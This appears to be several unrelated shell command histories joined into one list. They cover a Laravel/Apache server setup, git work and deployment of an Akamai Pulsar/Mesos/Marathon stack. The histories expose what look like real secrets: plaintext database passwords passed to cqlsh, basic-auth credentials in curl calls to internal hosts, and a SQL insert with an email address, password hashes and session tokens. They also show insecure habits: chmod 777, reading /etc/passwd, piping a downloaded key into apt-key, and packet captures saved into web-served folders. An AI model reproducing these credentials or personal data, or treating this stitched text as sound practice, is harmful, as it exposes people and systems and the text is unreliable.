+rm principal.ejs +clear +ls -l +rm home.css +clear +exit +rm singin-signup.html +clear +exit +ls -l +rm -f controllersApp.js +clear +exit +ls -l +rm directiveOcioso.js +rm directivePopUp.js +rm directiveRender.js +ls -l +rm directiveRenderOp.js +clear +exit +ls -l +rm popup.html +clear +exit +rm singin-signup.html +clear +exit +ls -l +rm principal.html +clear +ls -l +rm render.html +exit +ls -s +rm principal.ejs +clear} +clear +exit +ls -l +rm render.html +clear +ls -l +rm principal.ejs +exit +ls -l +ls -l +vi index.js +exit +cat /proc/cpuinfo +ls +grep -i "no_proc_sem" ./ +grep -r "no_proc_sem" ./ +grep -r "console" ./ +ls +ls +ls +ls +ls -a +ls +rm -rf cleanOS/ OS-161/ os161/ cs161/ +ls +rm -rf OS161-kernel/ complete_cs161.txt cscope.out +vim sys161 +vim README +git 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+git log +git push origin master +git log +git status +la +ls +ls +vim galactic_coders_description.txt +git log +git status +git add --all +git commit +git log +vim +vim galactic_coders_description.txt +git commit +git add --all +git commit +git log +vim galactic_coders_description.txt +git status +exit +~/.bashrc +vim ~/.bashrc +source ~/.bashrc +udacity +ls +ls +git cloneshCraciun/hello_android +ls +git status +git reset --hard +git log +git status +git status +git status +git status +git add --all +fit commit +git commit +git status +git add --all +git commit --amend +git status +git log +git push origin master +git status +git diff --app +git diff -- app +git reset --hard +git status +git add --all +git log +git log +git commit +git log +git commit --amend +git log +git push origin master +exit +udacity +git status +git log +git add --all +git commit --amend +git log +git push -f origin HEAD^:master +git log +git push origin master +git status +git add --all +git commit +git log +git push origin master +exit +udacity +ls +git log +git status +git add --all +git commmit +git commit +git commit --amend +git log +git push -f origin HEAD^:master +git log +git push origin master +git add D;\Studies\Udacity\repository +udacity +git status +git add --all +git commit +git log +git status +git add --all +git commit --amend +git push origin master +git status +git status +git add --all +git status +git commit +git log +git push origin master +exit +udacity +git status +git add --all +git log +git commit +git log +git push origin master +git log +exit +ls +pwd +cat /proc/ +ls /proc/ +ls +exit +ls -rlt +apt-get install squash-tools +apt-get install squashfs-tools +apt-get update +vi /etc/resolv.conf +sudovi /etc/resolv.conf +sudo vi /etc/resolv.conf +chmod +r /etc/resolv.conf +sudo vi /etc/resolv.conf +exit +apt-get update +ls -rtl +apt-get install squashfs-tools +ls -rlt +exit +ls +ping free.fr +ssh +ssh +ssh +ssh +ssh +ssh +ls +ls +ls +ls +virtualenv env +sudo apt-get install python-virtualenv +virtualenv env +source ./env/bin/activate +which django-admin.py +pip install django +virtualenv env +ls +source ./env/bin/activate +pip install django +git +sudo apt-get install git +git cloneshrikantvarma/birthdaywisher.git +ls +ls +ls +ls -info +ls -info +ls +rm -rf birthdaywisher +ls +git init +ls -info +git add .. +git add . +ls +git add * +git status +sudo su +ls +r.in.ascii -h +r.in.ascii -f input=topsar-smooth.txt output=LongValleyTopsar30 +gis.m +r.shaded.relief -h +r.shaded.relief map=LongValleyTopsar30 shadedmap=LongValleyShaded +exit +nano index.php +' + + + + + + +sdf + + +sudo chgrp -R www-data storage +chgrp -R www-data storage +ls +chgrp -R www-data storage +sudo chgrp -R www-data bootstrap/cache +chgrp -R www-data bootstrap/cache +chmod -R ug+rwx storage +chmod -R ug+rwx bootstrap/cache +ls +php artisan cache:clear +composer dump-autoload +php -i | grep USER +php artisan cache:clear +sudo chmod -R 777 vendor storage +chmod -R 777 vendor storage +ls +ls +ls -la +ls +ls +ls +ls -la +chmod 755 index.php +ls -la +chmod 777 index.php +chmod 755 index.php +chmod +r /var/www/html/ -R +chown incut -d: -f1 /etc/passwd +cut -d: -f1 /etc/passwd +ls +ls +chmod 777 autoload.php +ls +ls -a +chmod +x autoload.php +ls +ls +chmod -R 775 root/ +ls +ls +ls +nano .htaccess +nano .htaccess +ls +nano /root/.env +ls +php artisan route:list +nano /var/www/html/.htaccess +ifconfig +nano /var/www/html/.htaccess +nano /var/www/html/.htaccess +nano /etc/ +ls +nano apache2.conf +nano apache2.conf +sudo a2enmode rewrite +a2enmod rewrtie +service apache2ctl restart +service apache2ctl restart +service apachectl restart +apachectl restart +apachectl stop +service apachectl stop +service apache2ctl stop +apachectl -k graceful +apache2ctl -k graceful +apache2ctl stop +apache2ctl start +a2enmod rewrite +service apache2 restart +ls +ls +ls +ls +service apache2 stop +service apache2 start +ls +ls +php artisan migrate +mysql -u root -p +mysql -u root -p +php artisan migrate +ls +ls +ls +ls +nano app/Providers/AppServiceProvider.php +php artisan migrate +nano app/Providers/AppServiceProvider.php +php artisan migrate +php artisan migrate:refresh +nano /etc/my.cnf +nano /etc/mysql/my.cnf +/etc/init.d/mysql restart +mysql -u root -p mysql +php artisan migrate +nano /etc/mysql/my.cnf +/etc/init.d/mysql restart +php artisan migrate +ls +INSERT INTO `users` (`id`, `name`, `email`, `password`, `remember_token`, `created_at`, `updated_at`, `is_admin`) +VALUES + (1, 'Jake', 'jacobgreene1991@gmail.com', '$2y$10$PGRNesCZ4Gdug5.jjRSEGebjHO56QsWIXJckfDM/N8qoJLrAO5EiC', 'CtpLWnLpS91CzlGNH8hcERYLVYiJwOBOrl4Cz5wGOuVlTsBbz0dbDF4dkw0X', '2017-06-29 02:10:58', '2017-06-29 02:10:58', 1), + (2, 'dexter', 'dexter@mydog.com', '$2y$10$bjfJu6nCzho8teGwglPVvuwWPqls/kI2.YneE4nPnqRHmu.rVuRdi', 'X51YDxFPEKjZN6ZQsvRy8Qyg8GpF1KXr8ysc3LZqjADS0z8QgYvPUYkNcZtx', NULL, NULL, 0), + (3, 'Mattie', 'mattie@mygf.com', '$2y$10$z8Gd5PGW4vKR9r0oMPeeiOg9p9cRd2zzFHLGM9tXwFf08T87s0Qt2', 'yjTh48GCeQg0sbeRsHPVvrmpPzKfDvQ9qoKDB1TgqN9qUekj3FWe1yLlVFX2', NULL, NULL, 0), + (4, 'duke', 'duke@bestdog.com', '$2y$10$MvoyFXTXVz58GezKfoBYsuKdn1zeO81Z6cXdwJnmRhwKaOHutkOmm', NULL, NULL, NULL, 0), + (5, 'hope', 'hope@fish.com', '$2y$10$7iUPqpWQ90c0BV9GMYrkn..30GkOw.VsVRBseATm8yxNjulfRrVZK', NULL, NULL, NULL, 0); +mysql -u root +mysql -u root -p +ls +ls +ls +ls +ls +ls +nano editUserController.php +mv editUserController.php editusercontroller.php +ls +ls +ls +ls +nano editusers.blade.php +nano editusers.blade.php +composer dump-autoload +ls +nano home.blade.php +ls +ls +ls +ls +ls +ls +ls +restart +shutdown /r +reboot +ls +php artisan cache:clear +ls +ls +ls +nano editusercontroller.php +nano editusercontroller.php +nano editusercontroller.php +ls +ls +ls +nano home.blade.php +ls +php artisan clear:cache +php artisan cache:clear +nano home.blade.php +pwd +ls +ls +nano home.blade.php +ls +ls +ls +nano home.blade.php +ls +nano /root/resources/views/home.blade.php +reboot +mysql -u root -o +mysql -u root -p +reboot +php artisan tinker +ls +ls +composer dump-autoload +nano /etc/php5/apache2/php.ini +/etc/init.d/apache2 restart +ls +ls +pwd +ls +ls +php artisan storage:link +ls +ln -s /root/storage/app/faxes/ /var/www/html/ +ls +ls +ls +rm -rf * +ls +l +scd .. +ls +ls +composer require twilio/sdk:5.4 +composer require twilio/sdk:5.4.2=alpha1 +composer require twilio/sdk:5.4.2-alpha1 +composer dump-autoload +composer require twilio/sdk:5.12.1-alpha1 +composer dump-autoload +apt-get -y update +apt-get install phpmyadmin +nano /etc/apache2/apache2.conf +service apache2 restart +nslookup fax.progeek.me +apt-get tcpdump +apt-get install tcpdump +ifconfig +tcpdump -i eth0 'port 80' +tcpdump -ni eth0 'p +tcpdump -i eth0 'port 80' -s0 -w /root/ +tcpdump -i eth0 'port 80' -s0 -w /root/pcap.pcap +ls +tcpdump pcap.pcap +mv pcap.pcap /var/www/html/faxes/ +composer dump-autoload +tcpdump -i eth0 'port 80' +tcpdump -i eth0 'port 80' -s0 -w /var/www/html/faxes/pcap1.pcap +composer dump-autoload +tcpdump -i eth0 'port 80' -s0 -w /var/www/html/faxes/pcap1.pcap +ls +tcpdump -s 0 -i eth0 'port 80' -w /root/storage/pcap2.pcap +mv /root/storage/pcap2.pcap /root/storage/app/faxes/pcap2.pcap +tcpdump -s 0 -i eth0 'port 80' -w /root/storage/app/faxes/pcap2.pcap +tcpdump -s 0 -i eth0 'port 80' -w /root/storage/app/faxes/pcap2.pcap +tcpdump -s 0 -i eth0 'port 80' -w /root/storage/app/faxes/pcap2.pcap +nano /root/app/Http/Controllers/getFaxController.php +composer dump-autoload +tcpdump -s 0 -i eth0 'port 80' -w /root/storage/app/faxes/pcap2.pcap +reboot +time +date +date --set="15 JUL 2017 9:57:25" +date +date +tcpdump -s 0 'port 80' -w /root/storage/app/faxes/pcap2.pcap +tcpdump -s 0 'port 80' -w /root/storage/app/faxes/pcap2.pcap +ln -s /var/www/html/public /root/storage/app/public/ +ls /var/www/html/ +ls +ls -la +rm public +ls -la +ln -s /root/storage/app/public/ /var/www/html/public +ls /var/www/html/ +php artisan dump-autoload +composer dump-autoload +time +date +ifconfig +tcpdump -i en0 -w /root/storage/app/public/pcap1.pcap +tcpdump -i en0 -w /root/storage/app/public/pcap1.pcap +ifconfig +tcpdump -i eth0 -w /root/storage/app/public/pcap1.pcap +tcpdump -i eth0 -w /root/storage/app/public/pcap2.pcap +date +hwclock --utc --systohc +date +hwclock --show +ntpupdate pool.ntp.gov +ntptime pool.ntp.gov +apt-get ntpdate +apt-get install ntpdate +ntpdate pool.ntp.gov +ntpdate pool.ntp.org +ntpdate +man ntpdate +nano /etc/timezone +man ntpdate +ntpdate +ntpdate pool.ntp.org +ntpd -d +ntpd -s +ntpd +service ntpd restart +ntptime +date +dpkg-reconfigure tzdata +date +composer dump-autoload +time +datetime +date +datet +date +reboot +tcpdump -i eth0 -w /root/public/storage/pcap3.pcap +tcpdump -i eth0 -w /root/public/storage/pcap3.pcap +datetime +date +nano config/app.php +reboot +ls +ls +ls +nano php.ini +tcpdump -i eth0 -w /root/storage/app/public/ +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +ls +nano config/app.php +nano config/app.php +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +nano config/app.php +nano config/app.php +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +tcpdump -i eth0 -w /root/storage/app/public/pcap4.pcap +ifconfig +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +rm -rf +ls +ls +rm -rf * +ls +ls +ls +ls +ls +ls +rm -rf * +ls +time +date +apt-get sngrep +apt-get install sngrep +apt-get update +apt-get install sngrep +wgets.irontec.com/public.key -q -O - | apt-key add - +apt-get update +apt-get install sngrep +nano /etc/apt/sources.list +nano /etc/apt/sources.list +apt-get update +apt-get install sngrep +apt-get install libgnutls30 +apt-get install libgnutls30 +sngrep[; x; +sngrep +apt-get install sngrep +sudo sed -i -e 's/xenial-getdeb/trusty-getdeb/' /etc/apt/sources.list{,.d/*.list} +sudo apt-get update +sed -i -e 's/xenial-getdeb/trusty-getdeb/' /etc/apt/sources.list{,.d/*.list} +ls +ls +ls +pwd +find / -name *web +find / -name web.php +vim /root/root/ +ls +ls +ls +ls +;s +ls +ls +ls +vim web.php +nano web.php +nslookup fax.progeek.me +dig fax.progeek.me +ls +ls +ls +nano rc +cat rc +ls +ls +nano rc +ls +ls +ps aux +ls +ls +nano syslog.service +man systemctl +cat ff-latest-9169.xml | grep -i pulsar +cat ~/workspace-eclipse/mesos/pulsar-apache-mesos/componentinfo.xml +vim ff-latest-9169.xml +cat ff-latest-9169.xml | grep -i pulsar +cat ~/workspace-eclipse/marathon/pulsar-marathon/componentinfo.xml +/a/bin/packit --clean --versions ff-latest-9169.xml /home/pdommeti/workspace-eclipse/mesos/common/components/ /home/pdommeti/workspace-eclipse/marathon/common/components/ /home/pdommeti/workspace-eclipse/docker/common/components/ +./cdp.py -c ~/pulsar-install/configuration.pulsar.shared --testnet-auto -s "pre,authgate,kmi_kdc,kmi_auditserver,forcefield" +./netdeploy -i -k --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +vim netmgmt.config +vim /a/bin/netdeploy +./netdeploy --ag -i -k --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +./netdeploy --ag -i -k --ip ",," -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +./netdeploy --ag -i --ip ",," -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +vim netmgmt.config +mtr pdr.akamai.com +mtr pdr-qa.akamai.com +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +dig pdr-qa.akamai.com +dig A pdr-qa.akamai.com +cat /etc/resolv +cat /etc/resolv.conf +dig A pdr-qa.akamai.com +docker pull pdr-qa.akamai.com/pulsar/test-java:1.0.2-SNAPSHOT-20160628185556-e3c1a2a +docker pull pdr-qa.akamai.com/library/tomcat8 +docker pull pdr-qa.akamai.com/library/tomcat8:platform-2.4.v1-LATEST +curl -vk +ls -lrt +ls -lrt +p4 client +p4 sync +clear +ls -lrt +ls -lrt +rm -r 9168 +clear +p4 sync +cp configuration.pulsar.shared ~/pulsar-install/ +rm ff-latest-9168.xml +vim ff-latest-9169.xml +ls -lrt +rm -r packed +rm -rf packed +clear +ls -lrt +rm -r setup/ +clear +vbe +sudo ln -s /usr/bin/gpg /usr/local/akamai/bin/gpg +ls -lrt /usr/bin/ | grep gpg +sudo ln -s /usr/bin/gpg /usr/local/akamai/bin/gpg +vbe +mkdir bin +sudo mkdir bin +ls -lrt +ls -lrt +ls -lrt +sudo ln -s /usr/bin/gpg /usr/local/akamai/bin/gpg +vbe +ls -lrt +rm -r setuplog.198.18.58.* +ls -lrt +clear +gwsh sqainfra-mesos01.sqaextranet.akamai.com +gwsh root@sqainfra-mesos01.sqaextranet.akamai.com +clear +vim configuration.pulsar.shared +ls -lrt +tail -f setuplog. +gwsh root@ +tail -f /tmp/netdeploy-pdommeti/setuplog. +gwsh root@ +gwsh root@ +gwsh root@ +vim configure_pulsarmesos.pl +vim translate_pulsarmesos.pm +ls -lrt +vim pulsar-mesos-slave.py +vim mesos-slave-config.dry +vim mesos-master-config.dry +vim mesos-slave-config.dry +vim mesos-master-config.dry +vim mesos-slave-config.dry +vim configuration.pulsar.shared +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 BUNDLERFLAGS=--os=common -d +git pull +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 BUNDLERFLAGS=--os=common +/a/bin/packit --clean --versions ff-latest-9169.xml /home/pdommeti/workspace-eclipse/mesos/common/components/ /home/pdommeti/workspace-eclipse/marathon/common/components/ /home/pdommeti/workspace-eclipse/docker/common/components/ +./netdeploy --ag -i -k --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +vim translate_pulsarmesos.pm +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 BUNDLERFLAGS=--os=common +ls -lrt +ls -lrt +ls -lrt +vim pulsar-apache-mesos-cp.tar.gz +vim ff-latest-9169.xml +/a/bin/packit --clean --versions ff-latest-9169.xml /home/pdommeti/workspace-eclipse/mesos/common/components/ /home/pdommeti/workspace-eclipse/marathon/common/components/ /home/pdommeti/workspace-eclipse/docker/common/components/ +./netdeploy --ag -i -k --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +vim configuration.pulsar.shared +git pull +git l +vim translate_pulsarmesos.pm +vim configure_pulsarmesos.pl +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 BUNDLERFLAGS=--os=common +vim ../common/components/common/pulsar-apache-mesos-1.7/pulsar-apache-mesos-cp.tar.gz +vim ../common/components/common/pulsar-apache-mesos-1.7/pulsar-apache-mesos-config.tar.gz +./akamake bundle AKAMAKE-LINUX-BUILD-64=1 +vim ../common/components/alsi8/pulsar-apache-mesos-1.7/pulsar-apache-mesos.tar.gz +/a/bin/packit --clean --versions ff-latest-9169.xml /home/pdommeti/workspace-eclipse/mesos/common/components/ /home/pdommeti/workspace-eclipse/marathon/common/components/ /home/pdommeti/workspace-eclipse/docker/common/components/ +./netdeploy --ag -i -k --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +vbe +clear +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@reglab.jsonsqainfra-mesos02.sqaextranet.akamai.com:8443/v2/apps +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@reglab.jsonsqainfra-mesos02.sqaextranet.akamai.com:8443/v2/apps?force=true +vbe +./cdp.py -c ~/pulsar-install/configuration.pulsar.shared --testnet-auto -s "pre,authgate,kmi_kdc,kmi_auditserver,forcefield" +vim configuration.pulsar.shared +gwsh root@sqainfra-zk01.sqaextranet.akamai.com +clear +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@reglab.jsonsqainfra-mesos02.sqaextranet.akamai.com:8443/v2/apps?force=true +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@reglab.jsonsqainfra-mesos02.sqaextranet.akamai.com:8443/v2/apps +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@reglab.jsonsar.akamai.com:8443/v2/apps +ls -lrt +ls -lrt +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true +ls -lrt +docker build . +docker tag ccd9a73cbeee pdr-qa-upload.akamai.com/pulsar/test-java:1.0.0-RELEASE +docker tag b9f7b237f50b pdr-qa-upload.akamai.com/pulsar/test-java:1.0.0-RELEASE +docker push pdr-qa-upload.akamai.com/pulsar/test-java:1.0.0-RELEASE +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@reglab.jsonsar.akamai.com:8443/v2/apps +git pull +git l +ls -lrt +cat service-engine-logging-agent-infra-app.json +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@service-engine-logging-agent-infra-app.jsonsar.akamai.com:8443/v2/apps +ls -lrt +cat service-engine-logging-canary-app.json +curl -ik -u pdashboard_infra:p_dashboardinfra -X POST --header "Content-Type:application/json" -d@service-engine-logging-canary-app.jsonsar.akamai.com:8443/v2/apps +docker ps -a +docker images +docker rmi b9 +docker build . +docker tag ef006c43e537 pdr-qa-upload.akamai.com/pulsar/test-java:1.0.1-RELEASE +docker push pdr-qa-upload.akamai.com/pulsar/test-java:1.0.1-RELEASE +./netdeploy --ag -i -k --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +./netdeploy --ag -i --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +ls -lrth +rm -r setuplog.192.168.64.* +ls -lrth +sql2 -q storage.dev.query.akadns.net "select SUM(files) files, SUM(bytes) / (1000 * 1000 * 1000 * 1000) PB +sql2 -q storage.dev.query.akadns.net "select SUM(files) files, SUM(bytes) / (1000 * 1000 * 1000 * 1000) PB" +sql2 -q storage.dev.query.akadns.net "select SUM(files) files, SUM(bytes) / (1000 * 1000 * 1000 * 1000) PB from repl_disk_usage" +sql2 -q storage.dev.query.akadns.net "select SUM(files) files, SUM(bytes) / (1000 * 1000 * 1000 * 1000 * 1000) PB from repl_disk_usage" +gwsh root@sqainfra-docker03.sqaextranet.akamai.com +./netdeploy --ag -i --region 7213 -c ~/pulsar-install/configuration.pulsar.shared --hostsetup-options='verbose, allow-disruption' +clear +docker ps +clear +gwsh root@marathon.infra.pulsar.akamai.com +gwsh root@sqainfra-mesos02.sqaextranet.akamai.com +gwsh root@marathon.infra.pulsar.akamai.com +telnet dev-portal-cdb.akamai.com 9042 +telnet sqa-portal-cdb.akamai.com 9042 +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=dev -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/dev-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p dev7482pulsar_dashboard --ssl dev-portal-cdb.akamai.com +ls -lrt +p4 print //sandbox/agudla/cassandra/sqa-portal-cdb_cert_chain.crt > new.sqa-portal-cdb_cert_chain.crt +vim new. +vim new.sqa-portal-cdb_cert_chain.crt +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/new.sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +md5sum sqa-portal-cdb_cert_chain.crt +md5sum new. +md5sum new.sqa-portal-cdb_cert_chain.crt +openssl s_client -showcerts -connect dev-portal-cdb.akamai.com:9042 +openssl s_client -showcerts -connect sqa-portal-cdb.akamai.com:9042 +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/new.sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +clear +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +clear + +vbe +cp configuration.pulsar.shared ~/workspace-eclipse/branches/9169/configuration.pulsar.shared +p4 edit ~/workspace-eclipse/branches/9169/configuration.pulsar.shared +cp configuration.pulsar.shared ~/workspace-eclipse/branches/9169/configuration.pulsar.shared +sudo cp configuration.pulsar.shared ~/workspace-eclipse/branches/9169/configuration.pulsar.shared +ls -lrt +p4 diff configuration.pulsar.shared +p4 edit configuration.pulsar.shared +p4 diff configuration.pulsar.shared +p4 submit +p4 opened +p4 open configuration.pulsar.shared +p4 diff configuration.pulsar.shared +p4 submit +clear +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +vbe +clear +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +clear +vb3e +vbe +clear +sudo apt-get install tortoise +sudo apt-get install tortoisesvn +sudo apt-cache search tortoise +git clone +clear +ls -lrt +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/dev-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p dev7482pulsar_dashboard --ssl dev-portal-cdb.akamai.com +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +ls -lrt +clear +keytool -printcert -file ./sqa-portal-cdb_cert_chain.crt +ls -lrt +ls -lrt +vim new.sqa-portal-cdb_cert_chain.crt +keytool -printcert -file ./sqa-portal-cdb_cert_chain.crt +vim new.sqa-portal-cdb_cert_chain.crt +mv sqa-portal-cdb_cert_chain.crt bk.sqa-portal-cdb_cert_chain.crt +mv new.sqa-portal-cdb_cert_chain.crt sqa-portal-cdb_cert_chain.crt +rm new.pem +ls -lrt +clear +ls -lrt +ping dev-portal-cdb.akamai.com +telnet 22 +ping dev-portal-cdb.akamai.com +ls -lrt +cp sqa-portal-cdb_cert_chain.crt certs/ +clear +ls -lrt +ping dev-portal-cdb.akamai.com +telnet dev-portal-cdb.akamai.com 22 +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +kssh root@ +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +git pull +grep -r "pong" . +git branch +vim ./src/test/scala/mesosphere/marathon/integration/ForwardToLeaderIntegrationTest.scala +vim ./src/test/scala/mesosphere/marathon/api/SystemResourceTest.scala +git checkout releasing-0.9 +grep -r "pong" . +fg +git branch +git checkout releases/1.4 +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/sqa-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p sqa7482pulsar_dashboard --ssl sqa-portal-cdb.akamai.com +keytool -list -keystore /usr/lib/jvm/java-8-oracle/jre/lib/security/cacerts | grep ak +ls -lrt +ls -lrt +keytool -list -keystore /usr/lib/jvm/java-8-oracle/jre/lib/security/cacerts | grep ak +python -v +openssl s_client -showcerts -connect dev-portal-cdb.akamai.com:9042 +git pull +git branch +git fetch release/1.9.2 +gwsh pulsar.marathon.akamai.com +gwsh marathon.pulsar.akamai.com +vim configuration.pulsar.shared +p4 open configuration.s1.pulsar +vim configuration.s1.pulsar +ls -lrt +p4 submit +dig portal-db.akamai.com +gwsh 4-docker19.extranet +gwsh p4-docker19.extranet.akamai.com +python +clear +ssh root@pulsar-dashboard.sqa2.qa.akamai.com +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +kcd feature/upgrade-1.4.2 +git branch -m upgrade-docker-17.03.1-ce-rc1 upgrade-17.04.0-ce +git branch -m upgrade-17.04.0-ce +git push --set-upstream origin upgrade-17.04.0-ce +vim hostsetup/configure_pulsardocker.pl +git status +git add . +git commit -m "SET-3892.Setting the right version in SM" +git push +cat componentinfo.xml +git pull +git checkout master +git pull +git checkout master +git pull +git checkout master +git pull +clear +ls -lrt +p4 client +cat ~/gitp4sync.conf +./gitp4sync.py pdocker1 +git checkout master +git pull + +cat ~/gitp4sync.conf +./gitp4sync.py pmesos1 +./gitp4sync.py pmar1 +git pull +git l +./gitp4sync.py pmar1 +p4 sync +ls -lrt +./gitp4sync.py pmar1 +vim gitp4sync.py +vim gitp4sync.py -v pmar1 +./gitp4sync.py -v pmar1 +./gitp4sync.py --verbose pmar1 +git --work-tree=/home/pdommeti/workspace-eclipse/marathon/pulsar-marathon --git-dir=/home/pdommeti/workspace-eclipse/marathon/pulsar-marathon/.git diff --name-status dddb43f9b9f340906e47c631e043eb47d3ccd59e HEAD +git status +cat ~/workspace-eclipse/p4_pulsar/pulsar-marathon/lastgitcommit +git diff dddb43f9b9f340906e47c631e043eb47d3ccd59e HEad +git diff dddb43f9b9f340906e47c631e043eb47d3ccd59e HEAD +ls -lrt +ls -lrt +ls -lrt +git diff --names-status dddb43f9b9f340906e47c631e043eb47d3ccd59e HEad +git --work-tree=/home/pdommeti/workspace-eclipse/marathon/pulsar-marathon --git-dir=/home/pdommeti/workspace-eclipse/marathon/pulsar-marathon/.git diff --name-status dddb43f9b9f340906e47c631e043eb47d3ccd59e HEAD +p4 opened +clear +git pull +ls -lrt +git pull +p4 sync +p4 client +p4 client -o +p4 integrate -i //projects/releases/pulsar-9169/... //projects/releases/pulsar-9590/... +p4 submit +clear +p4 client +rm -rf 9169/ +clear +ls -lrt +p4 edit configuration.prod.pulsar +subl configuration.prod.pulsar +gwsh root@sqainfra-docker05.sqaextranet.akamai.com +p4 edit configuration.pulsar.shared +p4 edit configuration.prod.pulsar +p4 diff +diff configuration.pulsar.shared ~/pulsar-install/configuration.pulsar.shared +clear +p4 submit +p4 edit configuration.s1.pulsar configuration.sqa2.pulsar +subl configuration.sqa2.pulsar +ls -lrt +cat dashboard_credentials.properties +p4 opened +p4 diff +subl configuration.s1.pulsar +vim configuration.pulsar.shared +p4 opened +p4 diff +p4 open configuration.prod.pulsar +vim configuration.prod.pulsar +p4 diff +p4 submit +clear +ls -lrt +ls -lrt +CONSUMER='{the/path/to/bin/kafka-console-consumer.sh} --new-consumer' +CONSUMER='{/opt/kafka/bin/kafka-console-consumer.sh} --new-consumer' +vim ~/.kafka-console-consumer.properties + +ls -lrt +/opt/kafka/bin/kafka-consumer-perf-test.sh --consumer.config=/home/pdommeti/.kafka-console-consumer.properties --bootstrap-server=$BOOTSTRAP_SERVER --topic $TOPIC +/opt/kafka/bin/kafka-consumer-perf-test.sh --bootstrap-server=$BOOTSTRAP_SERVER --topic $TOPIC +CONSUMER='/opt/kafka/bin/kafka-console-consumer.sh --new-consumer' +CONSUMER_PROPERTIES=$HOME/.kafka-console-consumer.properties +TOPIC=scheduler-engine +cat ~/.kafka-console-consumer.properties +BOOTSTRAP_SERVER=p3-kafbrk01.extranet.akamai.com:6667 +vim ~/.kafka-console-consumer.properties +$CONSUMER --consumer.config=$CONSUMER_PROPERTIES --bootstrap-server=$BOOTSTRAP_SERVER --topic $TOPIC +mv ~/Downloads/kafka_2.11- .. +rm ~/Downloads/kafka_2.11-\ \(1\).tgz +ls -lrt +ls -lrt +rm -r libs/ config/ bin/ logs/ +tar -xvzf kafka_2.11- +ls -lrt +ls -lrt kafka_2.11- +mv * .. +sudo mv * .. +rm kafka_2.11- +sudo mv kafka_2.11- kafka +ls -lrt +mv kafka_2.11-* . +ls -lrt +rm -r kafka_2.11- +rm kafka_2.11- +sudo rm kafka_2.11- +$CONSUMER --consumer.config=$CONSUMER_PROPERTIES --bootstrap-server=$BOOTSTRAP_SERVER --topic $TOPIC +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true +mvn clean compile package -DskipTests=true -Dmaven.javadoc.skip=true && java -Ddashboard.home=/home/pdommeti/akamai-git/dashboard_secrets -Dspring.profiles.active=dev -jar dashboard-webapp/target/pulsar-dashboard-webapp.jar +export SSL_CERTFILE=/home/pdommeti/akamai-git/dashboard_secrets/conf/dev-portal-cdb_cert_chain.crt && cqlsh --cqlversion=3.2.1 -u pulsar_dashboard -p 